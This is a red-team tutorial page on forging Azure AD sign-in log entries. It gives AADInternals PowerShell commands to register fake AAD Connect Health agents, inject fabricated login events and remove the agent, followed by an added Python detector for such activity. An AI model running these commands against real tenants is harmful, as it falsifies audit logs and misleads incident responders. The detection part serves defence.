# Registering Fake Agents for Log Spoofing

We covered spoofing AAD sign-in logs as an ADFS administrator in [Spoofing Azure Sign-In Logs](https://otter.gitbook.io/red-teaming/notes/aad/spoofing-azure-sign-in-logs); now we'll see how to do the same as a Global Administrator on the AAD side.

As a Global Admin, we can register our own AAD Connect Health agent:

```powershell
PS /home/otter> New-AADIntHybridHealthService -DisplayName "minions.onmicrosoft.com" -Signature "minions.onmicrosoft.com" -Type AdFederationService
```

or register a new ADFS server:

```powershell
PS /home/otter> Register-AADIntHybridHealthServiceAgent -ServiceName AdFederationService-minions.onmicrosoft.com -MachineName "<something>" -MachineRole AdfsServer_2016
```

After this setup, we are once again free to generate fake login events:

```powershell
PS /home/otter> $events = @(
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter1@minions.com" -IPAddress "1.1.1.1" -NetworkLocationType Extranet
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter2@minions.com" -IPAddress "2.2.2.2" -NetworkLocationType Extranet
>> )
PS /home/otter> Send-AADIntHybridHealthServiceEvents -AgentInfo $agentInfo -Events $events -Verbose
```

To remove the fake agents we created, we can use:

```powershell
PS /home/otter> Remove-AADIntHybridHealthService -ServiceName "<agent_service_name>"
```
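
For the defender's side of the steps above, an added example (not from the original page or from AADInternals) that scans Azure Activity Log rows for Hybrid Health service and server changes, including a service that is registered and then removed shortly afterwards. The column names follow the Log Analytics `AzureActivity` table and, like the operation names, the caller allowlist and the sample rows, are assumptions to check against your own export.

```python
from datetime import datetime, timedelta

# Assumed Azure Activity Log operation names (AD Connect Health resource provider).
O = "Microsoft.ADHybridHealthService/services"
WATCHED = {
    (O + "/action").lower(): "service created or updated",
    (O + "/servicemembers/action").lower(): "server registered",
    (O + "/delete").lower(): "service deleted",
}

def service_name(resource_id):
    """Return the path segment after /services/, or a marker if it is absent."""
    parts = resource_id.split("/")
    lowered = [p.lower() for p in parts]
    if "services" in lowered[:-1]:
        return parts[lowered.index("services") + 1]
    return "(unnamed)"

def find_agent_changes(records, approved_callers, window=timedelta(hours=24)):
    """Flag watched operations by callers outside approved_callers (lowercase),
    plus any service deleted within `window` of first being seen."""
    findings, first_seen = [], {}
    for row in sorted(records, key=lambda r: datetime.fromisoformat(r["TimeGenerated"])):
        op = row["OperationNameValue"].lower()  # casing differs between exports
        if op not in WATCHED:
            continue
        svc = service_name(row["ResourceId"])
        when = datetime.fromisoformat(row["TimeGenerated"])
        caller = row["Caller"].lower()
        if caller not in approved_callers:
            findings.append((svc, WATCHED[op], caller))
        if not op.endswith("/delete"):
            first_seen.setdefault(svc, when)
        elif svc in first_seen and when - first_seen[svc] <= window:
            findings.append((svc, "short-lived service", caller))
    return findings

# Constructed sample rows (not real tenant data).
KEYS = ("TimeGenerated", "OperationNameValue", "ResourceId", "Caller")
P, OLD, NEW = "/providers/" + O + "/", "AdFederationService-sts.example.com", "AdFederationService-example.onmicrosoft.com"
SAMPLE = [dict(zip(KEYS, r)) for r in [
    ("2024-01-08T08:00:00+00:00", O + "/servicemembers/action", P + OLD + "/servicemembers/0001", "adfs-ops@example.com"),
    ("2024-01-10T09:00:00+00:00", (O + "/action").upper(), P + NEW, "new-admin@example.com"),
    ("2024-01-10T09:02:00+00:00", O + "/servicemembers/action", P + NEW + "/servicemembers/0002", "new-admin@example.com"),
    ("2024-01-10T09:40:00+00:00", O + "/delete", P + NEW, "new-admin@example.com"),
    ("2024-01-10T09:45:00+00:00", "Microsoft.Compute/virtualMachines/write", "/subscriptions/x/vm1", "new-admin@example.com"),
]]
```

Call `find_agent_changes(SAMPLE, {"adfs-ops@example.com"})` to get one tuple per finding as `(service, reason, caller)`.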


